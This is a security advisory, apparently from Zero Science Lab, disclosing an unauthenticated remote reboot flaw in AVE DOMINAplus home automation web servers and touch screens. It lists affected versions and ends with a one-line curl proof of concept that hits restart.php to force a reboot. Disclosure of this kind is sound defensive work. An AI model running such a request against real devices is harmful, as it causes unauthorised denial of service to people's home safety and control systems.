AVE DOMINAplus <=1.10.x Unauthenticated Remote Reboot
Vendor: AVE S.p.A.
Product web page: https://www.ave.it |
https://www.domoticaplus.it
Affected version: Web Server Code 53AB-WBS - 1.10.62
Touch Screen Code TS01 - 1.0.65
Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
Touch Screen Code TS05 - 1.10.36
Models: 53AB-WBS
TS01
TS03V
TS04X-V
TS05N-V
App version: 1.10.77
App version: 1.10.65
App version: 1.10.64
App version: 1.10.62
App version: 1.10.60
App version: 1.10.52
App version: 1.10.52A
App version: 1.10.49
App version: 1.10.46
App version: 1.10.45
App version: 1.10.44
App version: 1.10.35
App version: 1.10.25
App version: 1.10.22
App version: 1.10.11
App version: 1.8.4
App version: TS1-1.0.65
App version: TS1-1.0.62
App version: TS1-1.0.44
App version: TS1-1.0.10
App version: TS1-1.0.9
Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home
Automation System.
Designed to revolutionize your concept of living. DOMINA plus is
the AVE home
automation proposal that makes houses safer, more welcoming and
optimized. In
fact, our home automation system introduces cutting-edge
technologies, designed
to improve people's lifestyle. DOMINA plus increases comfort, the
level of safety
and security and offers advanced supervision tools in order to
learn how to
evaluate and reduce consumption through various solutions dedicated
to energy
saving.
Desc: The application suffers from an unauthenticated reboot
command execution.
Attackers can exploit this issue to cause a denial of service
scenario.
Tested on: GNU/Linux 4.1.19-armv7-x7
GNU/Linux 3.8.13-bone50/bone71.1/bone86
Apache/2.4.7 (Ubuntu)
Apache/2.2.22 (Debian)
PHP/5.5.9-1ubuntu4.23
PHP/5.4.41-0+deb7u1
PHP/5.4.36-0+deb7u3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5548
Advisory URL:
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5548.php
06.10.2019
--
curl -sk https://192.168.1.10/restart.php >/dev/null
